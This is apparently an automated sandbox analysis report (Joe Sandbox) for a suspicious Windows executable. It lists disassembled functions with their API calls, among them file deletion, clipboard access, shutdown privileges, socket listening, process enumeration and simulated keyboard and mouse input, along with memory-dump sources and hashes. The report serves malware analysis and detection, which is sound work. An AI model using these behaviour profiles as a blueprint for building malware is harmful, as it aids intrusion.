                                    • GetLocalTime.KERNEL32(?), ref: 007F8257
                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 007F8267
                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 007F8273
                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007F8310
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8324
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8356
                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 007F838C
                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 007F8395
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CurrentDirectoryTime$File$Local$System
                                    • String ID: *.*
                                    • API String ID: 1464919966-438819550
                                    • Opcode ID: 32756771c5628baffa0747d68712ca150c88b9b5b449aeddef3762afc4228a88
                                    • Instruction ID: 192f3b3684a33deb83934520bfa0bcc15467df64f2a9abe71f24408ee6b77847
                                    • Opcode Fuzzy Hash: 32756771c5628baffa0747d68712ca150c88b9b5b449aeddef3762afc4228a88
                                    • Instruction Fuzzy Hash: 98615BB25043499FCB10EF64C8449AFB3E8FF89314F04891DFA9997251EB39E945CB92
                                    Function 007ED076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00783AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00783A97,?,?,00782E7F,?,?,?,00000000), ref: 00783AC2
                                      • Part of subcall function 007EE199: GetFileAttributesW.KERNEL32(?,007ECF95), ref: 007EE19A
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007ED122
                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 007ED1DD
                                    • MoveFileW.KERNEL32(?,?), ref: 007ED1F0
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 007ED20D
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007ED237
                                      • Part of subcall function 007ED29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,007ED21C,?,?), ref: 007ED2B2
                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 007ED253
                                    • FindClose.KERNEL32(00000000), ref: 007ED264
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 1946585618-1173974218
                                    • Opcode ID: d4a3d968a9e4365cac036ffeaa3b30b259b9144863726984232922dc1da23a4b
                                    • Instruction ID: 34269cfc089d082a76f9fcef75cc8498623e5dbcf39c8258984280902a59d598
                                    • Opcode Fuzzy Hash: d4a3d968a9e4365cac036ffeaa3b30b259b9144863726984232922dc1da23a4b
                                    • Instruction Fuzzy Hash: 33619B3184214DEBCF15EBE1CA969FDB7B9AF19300F248065E50273191EB39AF09CB61
                                    Function 007FED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                    • String ID:
                                    • API String ID: 1737998785-0
                                    • Opcode ID: ddb591f0f57dcff67cb42688e154b52653a417183b6d1ef632fb980bdb7ce25e
                                    • Instruction ID: 24b9a1bad3ba4325776e296c290ad523f343db97b03701dad719bc74db8b7aea
                                    • Opcode Fuzzy Hash: ddb591f0f57dcff67cb42688e154b52653a417183b6d1ef632fb980bdb7ce25e
                                    • Instruction Fuzzy Hash: 60417B35604611AFE720DF15E888F69BBA5BF44318F14C099E5598BB72C779EC41CB90
                                    Function 007EE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 007E16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 007E170D
                                      • Part of subcall function 007E16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 007E173A
                                      • Part of subcall function 007E16C3: GetLastError.KERNEL32 ref: 007E174A
                                    • ExitWindowsEx.USER32(?,00000000), ref: 007EE932
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $ $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-3163812486
                                    • Opcode ID: b99c170a3c346f7ecc2415598a38fec6582b7189b490618e14d0da2e4d36efb8
                                    • Instruction ID: aaed13ce174b76a7d73e28e328d8e0dfd8ac4c4638b976059313d47fe0dab62b
                                    • Opcode Fuzzy Hash: b99c170a3c346f7ecc2415598a38fec6582b7189b490618e14d0da2e4d36efb8
                                    • Instruction Fuzzy Hash: BA012672612251ABEB1462B69C8AFFB72DCAB0C740F154C21F812E31D3E6A8AC4481A1
                                    Function 00801204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00801276
                                    • WSAGetLastError.WSOCK32 ref: 00801283
                                    • bind.WSOCK32(00000000,?,00000010), ref: 008012BA
                                    • WSAGetLastError.WSOCK32 ref: 008012C5
                                    • closesocket.WSOCK32(00000000), ref: 008012F4
                                    • listen.WSOCK32(00000000,00000005), ref: 00801303
                                    • WSAGetLastError.WSOCK32 ref: 0080130D
                                    • closesocket.WSOCK32(00000000), ref: 0080133C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                    • String ID:
                                    • API String ID: 540024437-0
                                    • Opcode ID: 593e7a0598bf01a189ec2833797882b580676c1aa75b85ca1c35c60a8f83997f
                                    • Instruction ID: 9dd12c9fb4226432fc20fd9896899efb52f412371426b845e02ee6fcaa5003e6
                                    • Opcode Fuzzy Hash: 593e7a0598bf01a189ec2833797882b580676c1aa75b85ca1c35c60a8f83997f
                                    • Instruction Fuzzy Hash: D2417F716001009FDB50DF68C889B69BBE5FF46328F188198E856DF2D6C775ED81CBA1
                                    Function 007ED3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00783AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00783A97,?,?,00782E7F,?,?,?,00000000), ref: 00783AC2
                                      • Part of subcall function 007EE199: GetFileAttributesW.KERNEL32(?,007ECF95), ref: 007EE19A
                                    • FindFirstFileW.KERNEL32(?,?), ref: 007ED420
                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 007ED470
                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 007ED481
                                    • FindClose.KERNEL32(00000000), ref: 007ED498
                                    • FindClose.KERNEL32(00000000), ref: 007ED4A1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                    • String ID: \*.*
                                    • API String ID: 2649000838-1173974218
                                    • Opcode ID: 63c0c2e43ad31cac7662f66a4057e71ad225cc5c6af22eb6204606882d718f5c
                                    • Instruction ID: 9ebef905839c45733e9afc8ed19e7e331d897e616d9a2235e92acee669277ad7
                                    • Opcode Fuzzy Hash: 63c0c2e43ad31cac7662f66a4057e71ad225cc5c6af22eb6204606882d718f5c
                                    • Instruction Fuzzy Hash: 0F31A031049385EBC311FF64C8958AFB7A8BEA6310F444A1DF8D193191EB38AE09C763
                                    Function 007BE4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: __floor_pentium4
                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                    • API String ID: 4168288129-2761157908
                                    • Opcode ID: 9df05af6ef7f1258d288892dcd932414e97af949e2b98fe69abf0ce7945098f2
                                    • Instruction ID: 015de7861c3a8ef85c93a48953f48cafcc3787b3fe68cdbccd317d0f9116c72e
                                    • Opcode Fuzzy Hash: 9df05af6ef7f1258d288892dcd932414e97af949e2b98fe69abf0ce7945098f2
                                    • Instruction Fuzzy Hash: 0FC23B72E086288FDB25CF28DD447EAB7B5EB49705F1441EAD84DE7241E778AE818F40
                                    Function 007F648E Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 367comCOMMON
                                    Download Yara Rule
                                    APIs
                                    • _wcslen.LIBCMT ref: 007F64DC
                                    • CoInitialize.OLE32(00000000), ref: 007F6639
                                    • CoCreateInstance.OLE32(0081FCF8,00000000,00000001,0081FB68,?), ref: 007F6650
                                    • CoUninitialize.OLE32 ref: 007F68D4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: CreateInitializeInstanceUninitialize_wcslen
                                    • String ID: .lnk
                                    • API String ID: 886957087-24824748
                                    • Opcode ID: d0322b2751354f2d3b24b3e7b06a52b4949c4f4ce44610300345b4ddfde549b1
                                    • Instruction ID: b95e9ea6ef57723a15e8bc64cf252da120a2674ad7f03c7a98e2d0e3f1804800
                                    • Opcode Fuzzy Hash: d0322b2751354f2d3b24b3e7b06a52b4949c4f4ce44610300345b4ddfde549b1
                                    • Instruction Fuzzy Hash: 78D17A71548305AFC304EF24C885A6BB7E8FF98704F14492DF6959B291EB34ED09CBA2
                                    Function 008022DA Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetForegroundWindow.USER32(?,?,00000000), ref: 008022E8
                                      • Part of subcall function 007FE4EC: GetWindowRect.USER32(?,?), ref: 007FE504
                                    • GetDesktopWindow.USER32 ref: 00802312
                                    • GetWindowRect.USER32(00000000), ref: 00802319
                                    • mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00802355
                                    • GetCursorPos.USER32(?), ref: 00802381
                                    • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008023DF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$Rectmouse_event$CursorDesktopForeground
                                    • String ID:
                                    • API String ID: 2387181109-0
                                    • Opcode ID: 571ab55b3cf3f818b1dc3538deb4c24358092225407d89d8838050d172ad58bc
                                    • Instruction ID: 245b4fefe2d6492547f5def66f64aba39ff5556b5c9709abe2cdf9de78948cfd
                                    • Opcode Fuzzy Hash: 571ab55b3cf3f818b1dc3538deb4c24358092225407d89d8838050d172ad58bc
                                    • Instruction Fuzzy Hash: 6431CD72505315ABC720DF54CC49B9BBBAAFF88314F004919F985D72A1DB74EA08CB92
                                    Function 007F9B2B Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 119filesleepCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 007F9B78
                                    • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 007F9C8B
                                      • Part of subcall function 007F3874: GetInputState.USER32 ref: 007F38CB
                                      • Part of subcall function 007F3874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 007F3966
                                    • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 007F9BA8
                                    • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 007F9C75
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                    • String ID: *.*
                                    • API String ID: 1972594611-438819550
                                    • Opcode ID: b5501fa542bf4485057d0d9ccd6af592a705212b21e76f9c4d2bda5cf510a118
                                    • Instruction ID: a45e90d48f63d5d408a9d63262cdd7851c4056efce462fd629b2a23375e62dbd
                                    • Opcode Fuzzy Hash: b5501fa542bf4485057d0d9ccd6af592a705212b21e76f9c4d2bda5cf510a118
                                    • Instruction Fuzzy Hash: 38414E7194420EEBCF15EF64C849BEEBBB8FF05310F144155E615A2291EB399E84CF61
                                    Function 0079997D Relevance: 7.9, APIs: 5, Instructions: 375COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00799BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00799BB2
                                    • DefDlgProcW.USER32(?,?,?,?,?), ref: 00799A4E
                                    • GetSysColor.USER32(0000000F), ref: 00799B23
                                    • SetBkColor.GDI32(?,00000000), ref: 00799B36
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Color$LongProcWindow
                                    • String ID:
                                    • API String ID: 3131106179-0
                                    • Opcode ID: 6da4f178953f83bb8e5cd09b8ad19f5ddc96822d42ad20d0ba67bd8fa1c253ec
                                    • Instruction ID: c918c167871088fbd564c8b6cd30acd61752bf0c7b9ece6beacc5a46ed8afc18
                                    • Opcode Fuzzy Hash: 6da4f178953f83bb8e5cd09b8ad19f5ddc96822d42ad20d0ba67bd8fa1c253ec
                                    • Instruction Fuzzy Hash: BDA1F970108504BFFF299A3CAC9DEBB2AADEB46350B14811EF602D6791DA2DDD41D372
                                    Function 00801806 Relevance: 7.7, APIs: 5, Instructions: 153networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0080304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0080307A
                                      • Part of subcall function 0080304E: _wcslen.LIBCMT ref: 0080309B
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0080185D
                                    • WSAGetLastError.WSOCK32 ref: 00801884
                                    • bind.WSOCK32(00000000,?,00000010), ref: 008018DB
                                    • WSAGetLastError.WSOCK32 ref: 008018E6
                                    • closesocket.WSOCK32(00000000), ref: 00801915
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                    • String ID:
                                    • API String ID: 1601658205-0
                                    • Opcode ID: 9fd544d969465af0108691e23ffe7faa4716bad86f700f167f7fc97f01dd08a8
                                    • Instruction ID: 83c0018eac387101371b886c1cd7489db0e9d934134721c2782f6b3ff57767b1
                                    • Opcode Fuzzy Hash: 9fd544d969465af0108691e23ffe7faa4716bad86f700f167f7fc97f01dd08a8
                                    • Instruction Fuzzy Hash: EF51A371A40200AFEB10AF24D88AF6A77A5EF45718F58C058F9169F3D3C775AD41CBA1
                                    Function 00811C41 Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: f1b313fe3dd70fe3a823e0b4c95867a7a3fb93522e3b0fb419eaa28f8bd57fa2
                                    • Instruction ID: d0d9c0ce993103784b244ad2bf07744de08560123448ed4556894947c618534a
                                    • Opcode Fuzzy Hash: f1b313fe3dd70fe3a823e0b4c95867a7a3fb93522e3b0fb419eaa28f8bd57fa2
                                    • Instruction Fuzzy Hash: 812191317802119FDB219F2AD848BAA7BADFF95314F198058E946CB251CB75DC82CBD4
                                    Function 00788060 Relevance: 7.4, Strings: 5, Instructions: 1151COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: e41abd0fe12ff63e25a682815bc905e70f51f57e0238dd494791f645dc33fef4
                                    • Instruction ID: 8ecf948727f4affc819335a5d928568f0f95e07dfda42c6eca97fda9e2fe8393
                                    • Opcode Fuzzy Hash: e41abd0fe12ff63e25a682815bc905e70f51f57e0238dd494791f645dc33fef4
                                    • Instruction Fuzzy Hash: 92A2B170E4061ACBDF64DF58C880BADB7B1BF54310F6481AED815A7285EB39AD81CF91
                                    Function 0080A67C Relevance: 6.2, APIs: 4, Instructions: 175processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32 ref: 0080A6AC
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 0080A6BA
                                      • Part of subcall function 00789CB3: _wcslen.LIBCMT ref: 00789CBD
                                    • Process32NextW.KERNEL32(00000000,?), ref: 0080A79C
                                    • CloseHandle.KERNEL32(00000000), ref: 0080A7AB
                                      • Part of subcall function 0079CE60: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,007C3303,?), ref: 0079CE8A
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706705340.000000000084C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706721728.0000000000854000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_780000_cJX8BV8LYG.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                    • String ID:
                                    • API String ID: 1991900642-0
                                    • Opcode ID: 5f6451b0a32ed5177af50dc7f190ea794eadca2a8a7c32d0a875f982e08ef36b
                                    • Instruction ID: c476c8991fc75a53804077fca6139b05d7a2fa99d9ae7cd4f4d423272f48f7b1
                                    • Opcode Fuzzy Hash: 5f6451b0a32ed5177af50dc7f190ea794eadca2a8a7c32d0a875f982e08ef36b
                                    • Instruction Fuzzy Hash: 86513871548301AFD714EF24D88AA6BBBE8FF89754F00892DF585D72A1EB34D904CB92
                                    Function 007EAA57 Relevance: 6.1, APIs: 4, Instructions: 107keyboardwindowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetKeyboardState.USER32(?,00000001,00000040,00000000), ref: 007EAAAC
                                    • SetKeyboardState.USER32(00000080), ref: 007EAAC8
                                    • PostMessageW.USER32(?,00000102,00000001,00000001), ref: 007EAB36
                                    • SendInput.USER32(00000001,?,0000001C,00000001,00000040,00000000), ref: 007EAB88
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1706508469.0000000000781000.00000020.00000001.01000000.00000003.sdmp, Offset: 00780000, based on PE: true
                                    • Associated: 00000000.00000002.1706491586.0000000000780000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.000000000081C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.1706550610.0000000000842000.00000002.00000001.01000000.00000003.sdmpDownload File
